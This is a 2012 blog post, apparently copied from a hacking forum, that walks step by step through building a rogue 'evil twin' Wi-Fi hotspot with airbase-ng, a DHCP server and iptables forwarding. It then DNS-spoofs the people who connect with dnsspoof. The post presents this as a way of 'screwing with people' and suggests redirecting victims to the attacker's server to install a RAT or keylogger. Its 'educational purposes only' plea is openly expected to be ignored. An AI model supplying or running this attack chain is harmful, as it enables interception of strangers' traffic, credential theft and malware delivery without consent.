Tuesday 2 October 2012

Tired of cracking WEP? Tired of WPA and countless hours of dictionary attacks? Then it's time to be sexy. YOU need to be sexy. And I'll show you how.

Here's the deal: how would you like to create a fake access point named, say Wifi Hotspot, and have people connect to YOU. From there, you can mess around with them, DNS spoof them to websites, or even your own web server convincing them to download your RAT/keylogger. Or how about monitoring all their websites and network traffic? I won't show you all of this, but I'll show you some.


First off, I would like to give a huge shoutout to member proxx8187. He helped me a great deal diagnosing problems in the making of this tutorial. Some of you may recognize him as the encyclopedia giving answers to all of your incessant questions ;) Another big shoutout goes to SpyFi. He inspired me to pursue this area and thus the creation of this tutorial. Some may recognize him as the genius behind many great tutorials all around HF, as well as his Android hacking threads. Another member who helped to diagnose problems was GeeMann. He's amazing and one of the highest quality users I've seen around the HF wireless section. In case you didn't know, he's the mastermind behind our WPS cracking tutorial. I also would like to thank CapitalS for helping me out too in the creation of this tutorial. This was made mostly by me, but would have been impossible without the help of these four great members!

Now the tutorial!! This is for educational purposes only. Please stay ethical with this and always get permission before you do something. I know you will ignore my plea for righteousness, but really, stay ethical. It will pay off in the long term! Now, let me give a brief overview of what we are going to accomplish here. We will create a fake access point with whatever name you like, and provide any person that connects to it with internet access, so they will think they are on a legitimate access point! Then from there, we can do many things do the client.

TABLE OF CONTENTS:

WHAT WE NEED

STEP ONE: GETTING THE DHCP3 SERVER

STEP TWO: CONFIGURING THE DHCP3 SERVER

STEP THREE: SETTING UP THE FAKE ACCESS POINT AND RUNNING THE DHCP3 SERVER

STEP FOUR: SETTING UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

STEP FIVE: SCREWING WITH PEOPLE


WHAT WE NEED:
1. Two wireless interfaces. (An external USB wifi adapter, plus your internal wifi laptop adapter) A good external wifi adapter is the ALFA AWUS036H. It's the one I use. You can get one for about 25 dollars on Amazon.
2. Backtrack 5 R2 (R1 should work, but this was tested on R2)
3. A brain please.


STEP ONE: GETTING THE DHCP3 SERVER

We need to update Backtrack and then install the dhcp3 server.

Code:
apt-get update && apt-get upgrade && apt-get dist-upgrade

Code:
apt-get install dhcp3-server

Cool we got all the stuff we need! We are ready to begin our attack. Please make sure that your laptop interface (should be wlan0) is connected to your own router. Make sure that your external interface is plugged in and ready to go (this one should be wlan1).

STEP TWO: CONFIGURING THE DHCP3 SERVER

We must begin the process of configuring our dhcp3 server so that our clients will receive an IP address when they connect. I expect your laptop interface to be connected to your router right now, and the external interface plugged in but not connected to any router, so we will run a check to determine our DNS address.

Code:
cat /etc/resolv.conf

See that IP address printed after "nameserver"? That's the DNS address. Please take note of it. In the soon following code, we will replace $dns with the DNS address you saw in the previous command.

Code:
gedit /etc/dhcp3/dhcpd.conf

If you are using Backtrack 5 KDE version, type this instead:

Code:
kwrite /etc/dhcp3/dhcpd.conf

If kwrite doesn't work, replace it with kate.

Now we have a text editor open with some text in it. Delete everything you see, and replace it with this:


Code:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers $dns;
range 192.168.2.130 192.168.2.140;
}

Remember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this:

Code:
option domain-name-servers 192.168.0.1;

STEP THREE: SET UP THE FAKE ACCESS POINT AND RUN THE DHCP3 SERVER

Let's configure our wireless interfaces shall we? We need to put our external interface into monitor mode. If you don't know the names of your interfaces, type "ifconfig" without quotes, and it will show you. In my situation, the external interface is wlan1, so just replace that with YOUR external interface.

Code:
airmon-ng start wlan1

Code:
airbase-ng -e "NAME OF ACCESS POINT HERE" -c 9 mon0

Now open a new terminal and type the following code which will set up our fake access point along with the dhcp3 server. Be sure to enter each command separately.

Code:
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

You should now have two terminals running. One with airbase-ng maintaining your fake access point, and another with the dhcp3 server open. We now need to set up our iptables to let our clients gain internet access.

STEP FOUR: SET UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

Your laptop interface should be connected to your router!! I am assuming your laptop interface is wlan0, but if not, type ifconfig to see which one it is. If you don't know what it is, you should close out of this tutorial. There are some variables in this next code you will need to replace yourself. I will tell you how and which.

We need to find your gateway address. Type the following into a new terminal:


Code:
route | grep "default"

See that IP address next to "default"? That is your gateway IP address, and you should take note of it. It should, in most cases, be the same as your DNS address. Remember your laptop interface? It should be wlan0, if not, you should know what it is. In the following code, replace $interface with your laptop interface, and $gateway with your gateway IP address. Be sure to enter each command separately (yes a lot of copy and pasting).

Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $interface -j MASQUERADE
iptables -A INPUT -i [+] -j ACCEPT
iptables -A OUTPUT -o [+] -j ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gateway

Congratulations!!! You have set up a fake access point with WORKING internet connection. Go ahead, give it a try using another computer and connect to your access point!

STEP FIVE: SCREWING WITH PEOPLE

Now that our client(s) is connected to YOU, you can do whatever you want to them! One of my favorites is the use of DNS spoofing. While your clients are connected to you, you can redirect whatever website they visit to whatever website you want them to go. Or, even better, you can redirect them to your own web server on your computer that could convince them to download a RAT or keylogger.

I will show you how to perform a simple DNS spoofing attack on your client. Create a file in your ROOT folder named spoof. Enter the following text into that file.


Code:
192.168.2.129 *

Now we initiate the DNS spoofing attack. This will redirect every website our client visits to YOU. So if you are running your own web server on your computer, they will be redirected to that web server. This is great for Java Applet attacks and other Social Engineering Toolkit stuff! Use the search option at the top of this website to find out more.

Code:
dnsspoof -i at0 -f /root/spoof

There, now every website they will visit will be redirected back to your own web server! Note, if you want this attack to be more flexible, edit the spoof file you created earlier.
192.168.2.129 is the IP address you want to redirect them to. The parameter after that is the website you want to be redirected. For example, if I want to redirect my client's requests for google.com to yahoo.com, I would enter the following in my spoof file.


Code:
98.139.183.24 google.com

Here, 98.139.183.24 is the IP address of yahoo.com. You can find the IP address of websites by pinging them in the terminal.

Code:
ping yahoo.com

This is the end of my tutorial. I hope you found it informative, as well as a fresh new way of performing wireless attacks. There are myriad ways you can leverage this attack to perform all sorts of man-in-the-middle attacks, but I leave that up to you to research. I did the hard part for you, so now it's up to you to figure out the rest! Please say thanks!

0 comments:

Post a Comment

CEX.io